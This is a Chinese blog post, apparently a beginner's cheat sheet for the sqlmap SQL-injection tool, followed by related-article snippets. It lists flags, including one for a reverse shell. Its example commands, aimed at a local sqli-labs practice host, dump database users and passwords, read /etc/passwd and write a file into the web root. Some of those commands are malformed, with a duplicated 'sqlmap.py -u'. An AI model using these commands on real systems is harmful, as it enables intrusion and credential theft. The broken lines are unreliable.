sqlmap工具使用

最新推荐文章于 2023-12-20 11:40:16 发布
最新推荐文章于 2023-12-20 11:40:16 发布
阅读量133 收藏 1
点赞数
分类专栏: 工具 文章标签: 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41048303/article/details/121759840
版权

sqlmap工具使用

1.参数介绍

参数说明
-b获取banner
-p指定测试参数
–proxy代理注入
–eval=EVALCODE使用HTTP参数污染
-a,all查询所有
–hostname主机名
–is-dba是否是管理员权限
–users枚举所有用户
–passwords枚举所有用户的密码
–roles枚举有所的用户角色
–schema枚举DBMS模式
–count枚举所有的条目数
–dump转存DBMS数据库表项目,需要定制字段名称
–search搜索列、表或数据库名称
–exclude-sysdbs枚举表时,排除系统数据库
–file-read=RFILE读取操作
–file-write=WFILE写入操作
–os-pwn反弹shell
–check-waf启发式检查waf/ips/ids保护
–level测试等级(1~5)
–tamper=TAMPER使用SQLMAP插件
–cookie=COOKIE指定HTTP Cookie,预登录

2.常用语法

# 判断是否存在注入点
sqlmap.py -u http://192.168.254.182/sqli-labs/Less-1/?id=1

# 判断文本中的请求是否存在注入 (文本内容为Web数据包)
sqlmap.py -r desktop/1.txt

# 查询当前用户下的所有数据库
sqlmap.py -u http://192.168.254.182/sqli-labs/Less-1/?id=1 --dbs

# 获取数据库中的表名
sqlmap.py -u "http://192.168.254.182/sqli-labs/Less-1/?id=1" -D pikachu --tables

# 获取表中的字段名
sqlmap.py -u "http://192.168.254.182/sqli-labs/Less-1/?id=1" -D pikachu -T users --columns

# 获取字段内容
sqlmap.py -u "http://192.168.254.182/sqli-labs/Less-1/?id=1" -D pikachu -T users -C username,password --dump

# 获取数据库的所有用户
sqlmap.py -u "sqlmap.py -u "http://192.168.254.182/sqli-labs/Less-1/?id=1"  --users

# 获取数据库用户的密码
sqlmap.py -u "sqlmap.py -u "http://192.168.254.182/sqli-labs/Less-1/?id=1" --passwords

# 获取当前网站数据库的名称
sqlmap.py -u "sqlmap.py -u "http://192.168.254.182/sqli-labs/Less-1/?id=1" --current-db

# 从数据库服务器中读取文件
sqlmap.py -u "http://192.168.254.182/sqli-labs/Less-1/?id=1" --file-read "/etc/passwd" -v 1

# 上传文件到数据库服务器中(注意权限)
sqlmap.py -u http://192.168.254.182/sqli-labs/Less-1/?id=1 --file-write "C:\Users\wcs\Desktop\root.txt" --file-dest "/var/www/html"

# 使用tamper脚本
sqlmap.py -u https://192.168.254.182/sqli-labs/Less-1/?id=1 --tamper "模块名"
小白头发少
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap工具介绍和使用
weixin_44720762的博客
04-28 4053
之前的博客中我一直在记录网页漏洞注入,虽然从演练过程看,当我们明白sql注入的原理,渗透过程似乎很简单。但事实上,在实际的渗透当中,漏洞注入并非仅仅只是通过简单的一两次尝试就能够得到测试人员想要的答案。很多时候,它需要经过许多次繁杂的尝试。所以,要提高渗透测试的效率,单纯的依靠测试人员自身的实战经验也是远远不够的。因此,我们需要渗透工具的帮助。而sqlmap就是这样一款强大而且便于操作的渗透测试工...
渗透测试工具sqlmap基础教程
最新发布
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
Sqlmap使用方法
w1304099880的博客
10-26 1252
sqlmap是一个非常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦。我们要了解这些语句。如下: 检查注入点: sqlmap-uhttp://ooxx.com.tw/star_photo.php?artist_id=11 爆所有数据库信息: sqlmap-uhttp://ooxx.com.tw/star_photo.php?artist_id=11--...
[工具使用]SqlMap
网络安全知识分享
08-29 5万+
[工具使用]SqlMapSqlMap常用指令探测目标网站是否存在注入 本文采用实例:sqli-labs靶场Less-1 SqlMap 一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是: 1、基于布尔
SQLMAP工具 详细使用方法
HAKUNAMATATATTA的博客
11-15 4603
SQLMAP 是一个开源的渗透测试工具,可以用来自动化的检测,利用 SQL 注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
sqlmap工具使用.emmx
07-26
sqlmap工具使用.emmx
sqlmap工具使用.xmind
07-26
sqlmap工具使用.xmind
sql注入与sqlmap工具使用
Q1n6
10-28 6284
SQL的注入类型: Boolean-based blind SQL injection(布尔型注入)Error-based SQL injection(报错型注入)UNION query SQL injection(可联合查询注入)Stacked queries SQL injection(可多语句查询注入)Time-based blind SQL injection(基于时间延迟注入)
sqlmap使用教程
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
sqlmap-tamper说明大全
10-03
本文档主要说明sqlmap的tamper使用情况以及主要使用方法,很全的说明文档。
SQLMAP使用
m0_58001548的博客
04-03 3913
SQLmap 是一款用来检测与利用 SQL 注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。官方网站下载 http://sqlmap.org/
sqlmap工具使用详解及使用sqlmap检测SQL注入漏洞姿势
qq_67473072的博客
07-25 3256
sqlmap工具使用详解及使用sqlmap检测SQL注入漏洞姿势
sqlmap用法
乔木同学
03-16 4700
sqlmap使用方法
SQLmap使用教程图文教程(超详细)
wangyuxiang946的博客
06-20 4万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
A_991128a的博客
09-07 1991
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用数据库4、查看「数据表」5、查看「字段」6、查看「数据」
SQLmap使用总结
Alexz__的博客
02-15 3869
1.简介 2.说明书翻译 3. 基础命令汇总 4.基础命令尝试 5.高级用法 壹 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQLServer、IBM DB2、SQLite、Firebird、Sybase和...
超详细SQLMap使用攻略及技巧
喜欢Python编程的程序员柚柚呀
12-20 5092
sqlmap支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。sqlmap支持五种不同的注入模式:l 基于布尔的盲注,即可以根据返回页面判断条件真假的注入;l 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;
Python SQLMap工具使用教程:基础操作与参数设置
"本文将详细介绍sqlmap工具使用,包括目标设定、请求设置、注入方法、检测策略和技术调整等方面。" sqlmap是一款强大的自动化SQL注入工具,主要由Python编写,用于检测和利用网站应用程序中的SQL注入漏洞。它支持...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值